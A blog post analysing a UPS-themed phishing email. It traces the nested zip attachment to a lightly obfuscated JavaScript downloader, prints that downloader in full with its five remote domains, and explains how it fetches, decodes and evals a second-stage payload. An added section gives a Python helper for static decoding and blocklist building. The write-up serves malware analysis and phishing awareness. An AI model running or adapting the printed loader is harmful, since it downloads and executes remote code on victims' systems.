Analysis and Takeapart of a UPS Parcel Shipping Problem Spoof

Submitted by AlReaud on Tue, 02/28/2017 - 19:26

At least once a week I get attachments from a “reputable” organization saying my account (that I don't have) has been locked due to suspicious activity being detected, a bank account (that I don't have) needs verification, or there is a problem with the shipment of a parcel (I didn't order). This week I got an interesting one from "Jordan Mccabe, UPS Station Manager". Sadly the sending individual doesn't know enough about the target to realize that "UPS" and "Post Office", well, kind of mismatch. But this one got me interested in doing some reverse engineering of the suspicious attachment because of its small size, only 817 bytes.

The text of the email is as follows:
Date: 02/26/2017 01:35 AM
From: virtual-user <webmaster@lippocastano.it>
Subject: Parcel #001210497 shipment problem, please review
To: Me
Body:

Dear Customer,
Your item has arrived at the UPS Post Office at February 25, but the courier was unable to deliver parcel to you.
Postal label is enclosed to this e-mail. Please check the attachment!
Yours sincerely,
Jordan Mccabe,
UPS Station Manager.

Attachment: UPS-Parcel-ID-001210497.zip
Attachment Checksum (MD5): 3e01923b9fd179c864bf40caffb21786

Screen capture of UPS Trojan Attachment Email showing highlights.

The highlighted areas are the tells that commonly give a spoof away: usually the sender address is strange or wrong, the grammar is wrong, and the context of the message is wrong.

Unzipping the attachment creates a second zip file with a .doc.zip extension (Microsoft Word Document.Compressed File) that is 694 bytes long. Most Windows installations hide known file extensions by default, so this will show as a .doc file rather than with its true extension, which is .zip.
Unzipped Attachment: UPS-Parcel-ID-001210497.doc.zip
Unzipped Attachment Checksum (MD5): 6a6d2e478e7a2b0259f1fcc333e7cde3

My interpretation is that if one were to double click on that file in a File Explorer window, Windows would actually extract the compressed file and try to execute it with the proper software. But we are doing this on Ubuntu 16.04, so we have to do it manually and make some assumptions that may not be valid. We'll get to that later…

Unzipping the compressed document file gives a third file with a .doc.js extension (Microsoft Word Document.JavaScript Source) that is, again, 817 bytes long. I believe that this JavaScript file would then be executed by the default browser on the system, which would normally be Microsoft Internet Explorer or, now, Microsoft Edge.
Unzipped Document File: UPS-Parcel-ID-001210497.doc.js
Unzipped Document File Checksum (MD5): f1bce6d06683909f54cefd27490c097d

The content of this JavaScript installer is as follows. It is lightly obfuscated (split string literals, a hex-escaped method name) in an attempt to defeat malware scanners. For simplicity I've removed blank lines:

  1. var sder = "P";
  2. var g2 = "M"+"sxml2.XMLHT"+""+"T"+""+sder;
  3. var m = "rWsE9ZXQhmXt5qxjCNca4Tq-BPesvEn4nxd0LQzxeVXfY-N-QdlpNfbwmn7_EZjSl61XGNgm";
  4. var x = new Array("ronniespersonaltouchjanitorialservice.com", "lasvegasmaps.net", "fitnessdigezt.com", "lovingfloridalife.com", "gestionysuministros.com");
  5. var t4 = "ht"+"tp";
  6. var mul = "qwadro";
  7. var ter = "/";
  8. for (var i=0; i<x.length; i++)
  9. {   
  10.     var vDJmB = function(){
  11.         return new ActiveXObject(g2);
  12.     }();
  13.     var e = vDJmB;
  14.     try
  15.     {       
  16.         var guama=["\x6F\x70\x65\x6E"];e[guama[0]]("G"+""+"E"+"T", t4 + ":"+ter+ter+x[i]+"/c"+"o"+"unter/?"+m,false)       
  17.         e.send();
  18.         var r = e.responseText;
  19.         if (r.length > 999+1 && r.indexOf(m) > -1)
  20.         {
  21.             eval(e.responseText.split(m).join(mul.substring(2,3)));
  22.             break;
  23.         };
  24.     }
  25.     catch(e)
  26.     {
  27.     };
  28. };


The JavaScript goes out to five websites and downloads encoded preliminary payloads that use something similar to steganography for obfuscation. After configuring variables, the script creates an ActiveX object, vDJmB (line 10), assigns it to a variable, e (line 13), then calls open on it with the parameters shown on line 16: an HTTP GET to each site's /counter/ path, with the key as the query string. The five sites listed for this version are in array variable x (line 4), and the key is in variable m (line 3). If the request succeeds, the script assigns the response to a variable, r (line 18), checks its size and that the key appears in it (line 19), and then evaluates the decoded primary payload (line 21), which is also JavaScript; the decoding consists of replacing every occurrence of the key with the single letter mul.substring(2,3) yields, "a".
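As an added example (not part of the original post), here is a Python helper that statically folds the split-string assignments of the sample above, rebuilds the beacon URLs the loop would request (useful for proxy-log searches and blocklists), and reproduces the gate and decode steps of lines 19 and 21 against a constructed response, with no network access and no eval. All function names are my own; SAMPLE is copied from the constants on the page.

```python
import re

# Constructed from the sample on the page: only the assignments the folder needs.
SAMPLE = r'''var sder = "P";
var g2 = "M"+"sxml2.XMLHT"+""+"T"+""+sder;
var m = "rWsE9ZXQhmXt5qxjCNca4Tq-BPesvEn4nxd0LQzxeVXfY-N-QdlpNfbwmn7_EZjSl61XGNgm";
var x = new Array("ronniespersonaltouchjanitorialservice.com", "lasvegasmaps.net", "fitnessdigezt.com", "lovingfloridalife.com", "gestionysuministros.com");
var t4 = "ht"+"tp";
var mul = "qwadro";
var ter = "/";
'''

ASSIGN = re.compile(r'var\s+(\w+)\s*=\s*(.+?);\s*$', re.M)

def resolve_vars(script):
    """Fold `"a"+"b"+var` concatenations and `new Array(...)` lists statically.
    Assumes no '+' inside string literals (true for this sample)."""
    env = {}
    for name, expr in ASSIGN.findall(script):
        arr = re.match(r'new Array\((.*)\)', expr)
        if arr:
            env[name] = re.findall(r'"([^"]*)"', arr.group(1))
            continue
        parts = []
        for tok in (t.strip() for t in expr.split('+')):
            parts.append(tok[1:-1] if tok.startswith('"') else str(env.get(tok, '')))
        env[name] = ''.join(parts)
    return env

def beacon_urls(env):
    """Rebuild the GET targets from line 16: t4 + "://" + host + "/counter/?" + m."""
    t4, ter, m = env['t4'], env['ter'], env['m']
    return [t4 + ':' + ter + ter + host + '/counter/?' + m for host in env['x']]

def decode_stage2(response, key, filler):
    """Gate of line 19 (length > 1000 and key present) and decode of line 21
    (split on key, join with filler == replace every key with filler). Returns
    the decoded script text instead of eval'ing it, or None if the gate fails."""
    if not (len(response) > 1000 and key in response):
        return None
    return response.replace(key, filler)

if __name__ == '__main__':
    env = resolve_vars(SAMPLE)
    print('ActiveX progid :', env['g2'])
    for url in beacon_urls(env):
        print('beacon         :', url)
    # Constructed stand-in for a stage-2 response: the key stands where an 'a' belongs.
    fake = 'v' + env['m'] + 'r x = 1;' + ' ' * 1000
    print('decoded        :', (decode_stage2(fake, env['m'], env['mul'][2:3]) or '').strip())
```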

TO BE CONTINUED…
